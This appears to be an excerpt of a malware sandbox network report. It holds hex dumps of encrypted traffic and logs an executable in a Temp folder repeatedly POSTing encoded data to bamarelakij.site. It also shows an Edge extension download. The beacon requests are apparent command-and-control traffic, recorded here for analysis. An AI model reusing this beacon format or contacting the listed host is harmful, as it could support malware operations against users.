                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 09 00 cf 0d 67 01 13 00 ec 0e 16 11 02 ec 08 76 59 67 01 65 9b b6 a7 b7 51 c9 59 a6 a0 27 a4 23 a2 a9 2a 15 10 00 22 07 b5 0d 13 00 ec 0e 16 11 02 ec 08 9a 59 b5 0d 65 9b b6 a7 b7 51 c9 59 a9 a7 23 2a ab a0 29 a2 2e 29 b2 b0 36 2b 27 a1 15 00 73 09 7f 0c 13 00 ec 0e 16 11 02 ec 08 73 59 7f 0c 65 9b b6 a7 b7 51 c9 59 b9 34 b7 39 3a b1 ba 3a b9 96 b1 ba b9 3a b7 b6 17 35 b9 b7 37 08 00 42 05 b3 0a 13 00 eb 0e 16 11 02 eb 08 76 59 b3 0a 96 c5 39 09 d9 75 16 03 65 5b a6 6e e5 46 50 f0 08 00 2f 0f f2 02 13 00 ec 0e 16 11 02 ec 08 76 59 f2 02 65 9b b6 a7 b7 51 c9 59 ab b2 31 10 22 b0 3a b0 08 00 96 08 2b 0d 13 00 eb 0e 16 11 02 eb 08 76 59 2b 0d 97 12 79 3e 92 e2 44 fc 66 8c e6 59 ae d1 02 0f 04 00 d0 02 48 05 0f 00 e4 0e 16
                                                                                                                                                            Data Ascii: QY8936gvYgeQY'#*"YeQY#*).)6+'ssYeQY49:::57BvY9ue[nFP/vYeQY1":+vY+y>DfYH
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: ba ee 81 55 24 00 b5 04 e3 0e 13 00 ec 0e 16 11 02 ec 08 76 59 e3 0e 65 9b b6 a7 b7 51 c9 59 a3 b7 b7 b3 36 b2 2e a1 34 39 b7 b6 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b1 34 39 b7 b6 b2 17 b2 3c b2 04 00 35 0d 51 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 51 0e f4 c9 71 76 05 ec be 45 08 00 cf 0c dc 04 13 00 ec 0e 16 11 02 ec 08 72 59 dc 04 65 9b b6 a7 b7 51 c9 59 a2 36 b2 b1 3a 39 ba b6 04 00 8a 07 5d 09 0f 00 e4 0e 16 11 02 e4 04 d8 59 5d 09 c1 f9 e3 82 87 36 6d a2 04 00 ec 0c cc 0a 0f 00 e4 0e 16 11 02 e4 04 34 59 cc 0a 9f 6a 11 53 6e 4f de 60 04 00 74 0d 84 0f 0f 00 e4 0e 16 11 02 e4 04 d8 59 84 0f 86 61 e0 37 b5 55 3b 26 12 00 57 0f 1c 0b 13 00 ec 0e 16 11 02 ec 08 9a 59 1c 0b 65 9b b6 a7 b7 51 c9 59 21 b7 b7 3a b9 3a 39 b0 38 a1 b0 b1 34 b2 17 38 b5 b3
                                                                                                                                                            Data Ascii: U$vYeQY6.49.886:7.49<5Q4YQqvErYeQY6:9]Y]6m4YjSnO`tYa7U;&WYeQY!::9848
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: 59 bb b0 36 36 b2 3a b9 2e a2 36 b2 b1 3a 39 ba b6 04 00 55 0e 4a 0e 0f 00 e4 0e 16 11 02 e4 04 34 59 4a 0e 6d 48 cd 1f 9c 6d 02 2c 08 00 98 05 7c 05 13 00 ec 0e 16 11 02 ec 08 76 59 7c 05 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 1d 05 73 06 13 00 ec 0e 16 11 02 ec 08 9a 59 73 06 65 9b b6 a7 b7 51 c9 59 32 b2 3b b4 b1 b2 a4 32 08 00 01 07 7e 0a 13 00 eb 0e 16 11 02 eb 08 76 59 7e 0a 44 4e b0 2a 09 b2 fd 29 b5 d0 2f 4d 35 81 bb da 08 00 a3 05 96 0c 13 00 ec 0e 16 11 02 ec 08 76 59 96 0c 65 9b b6 a7 b7 51 c9 59 38 39 b7 33 b4 36 b2 b9 08 00 61 07 10 01 13 00 ec 0e 16 11 02 ec 08 7a 59 10 01 65 9b b6 a7 b7 51 c9 59 28 39 b7 33 b4 36 b2 b9 04 00 16 0d f4 02 0f 00 e4 0e 16 11 02 e4 04 72 59 f4 02 a2 40 03 57 53 65 cc 64 0a 00 0d 03 9c 0c 13 00 ec
                                                                                                                                                            Data Ascii: Y66:.6:9UJ4YJmHm,|vY|eQY8936sYseQY2;2~vY~DN*)/M5vYeQY8936azYeQY(936rY@WSed
                                                                                                                                                            2025-01-06 22:04:47 UTC1369INData Raw: b4 b1 39 b7 b9 b7 33 3a 2e a2 32 b3 b2 2e a0 38 38 36 b4 b1 b0 3a b4 b7 37 2e b6 b9 b2 32 b3 b2 17 b2 3c b2 04 00 65 0f 15 05 0f 00 e4 0e 16 11 02 e4 04 76 59 15 05 0d 83 3d 7e fc a6 f2 4d 04 00 f0 0e 3a 08 0f 00 e4 0e 16 11 02 e4 04 ed 59 3a 08 b8 b0 eb e2 49 95 24 d1 04 00 c4 0b b0 0e 0f 00 e4 0e 16 11 02 e4 04 72 59 b0 0e 45 22 23 14 b5 e6 19 22 0b 00 3f 02 6f 09 13 00 ec 0e 16 11 02 ec 08 d8 59 6f 09 65 9b b6 a7 b7 51 c9 59 31 39 b7 bb b9 b2 39 17 b2 3c b2 04 00 bd 01 51 09 0f 00 e4 0e 16 11 02 e4 04 72 59 51 09 89 54 7b 8b 79 90 41 bd 20 00 b6 06 b9 05 13 00 ec 0e 16 11 02 ec 08 73 59 b9 05 65 9b b6 a7 b7 51 c9 59 32 b4 b9 b1 b7 39 32 38 3a 31 2e 26 b7 b1 b0 36 10 a9 3a b7 39 b0 b3 b2 2e 36 b2 3b b2 36 32 31 08 00 86 0e 4c 02 13 00 eb 0e 16 11 02 eb
                                                                                                                                                            Data Ascii: 93:.2.886:7.2<evY=~M:Y:I$rYE"#"?oYoeQY199<QrYQT{yA sYeQY2928:1.&6:9.6;621L


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            1192.168.2.449740104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:04:48 UTC455OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 53
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:04:48 UTC53OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii:
                                                                                                                                                            2025-01-06 22:04:48 UTC744INHTTP/1.1 200 OK
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:04:48 GMT
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ka5IbxYeTI1Qz14%2FFqz8rOS7IVrkNvkGsK40nruBJZH0iVubacciCLHEEqMUZhrJN1Ugp3fCQIBWlLzcDE5Xnt%2FT9038IXbv8tshPwf0vFfuCEaqtaS6yWOkeWIQTNqr8paS"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf01810b780caa-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1667&min_rtt=1661&rtt_var=635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1144&delivery_rate=1708601&cwnd=239&unsent_bytes=0&cid=d24cd247c8769b2f&ts=368&x=0"
                                                                                                                                                            2025-01-06 22:04:48 UTC24INData Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
                                                                                                                                                            Data Ascii: 12
                                                                                                                                                            2025-01-06 22:04:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: 0


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.449741104.21.80.524434176C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:04:49 UTC456OUTPOST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Accept: */*
                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15
                                                                                                                                                            fileid: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            Content-Length: 208
                                                                                                                                                            Host: bamarelakij.site
                                                                                                                                                            2025-01-06 22:04:49 UTC208OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 52 00 00 00 b5 05 3d 2c 95 a7 40 16 d7 35 c9 59 81 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 49 60 48 31 00 00 00 00 00 00 00 00 00 00 00 da 82 9e 16 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                            Data Ascii: R=,@5YI`H1(((
                                                                                                                                                            2025-01-06 22:04:49 UTC820INHTTP/1.1 204 No Content
                                                                                                                                                            Date: Mon, 06 Jan 2025 22:04:49 GMT
                                                                                                                                                            Connection: close
                                                                                                                                                            v: UMHdxanm3JkpSS6dDeuXisnY2ivv9pluVBLdEH51K7de7cSuxFBZbVKv7L2rHeFc6D5l/VX9Va+2HXLCaP37YNjz9VjTIQ
                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=caZ6WVqCsXuP24mf4%2FviQidt9cIy4PMJOhL0IEl6BH98uKArUkX9ygbEY4Hv6efFl6C7GPT6tTinGRmFF4JBkLzrc9nxzYeCTuNyXscc2sXEmWE2873BwCXp9aU1AeYsjxoY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8fdf01879cc6437a-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1620&min_rtt=1620&rtt_var=810&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4214&recv_bytes=1300&delivery_rate=300535&cwnd=223&unsent_bytes=0&cid=9e2b855fa531b5af&ts=355&x=0"


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.449768142.250.186.974435632C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-06 22:05:03 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                            Host: clients2.googleusercontent.com
                                                                                                                                                            Connection: keep-alive
                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                            2025-01-06 22:05:03 UTC563INHTTP/1.1 200 OK
                                                                                                                                                            X-GUploader-UploadID: AFiumC5-6XtLPRqSlIEtPq2b_tm7Gpf6mBFTggBpF98XrN213j0iZB6RyTKkBLsWuNGWLxpS
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Content-Length: 154477
                                                                                                                                                            X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                            Server: UploadServer
                                                                                                                                                            Date: Mon, 06 Jan 2025 15:58:13 GMT
                                                                                                                                                            Expires: Tue, 06 Jan 2026 15:58:13 GMT
                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                            Age: 22010
                                                                                                                                                            Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                            ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                            Content-Type: application/x-chrome-extension
                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                            Connection: close
                                                                                                                                                            2025-01-06 22:05:03 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                            Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                            Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                            Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                            Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                            Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                            Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                            Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                            Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                            2025-01-06 22:05:03 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                            Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
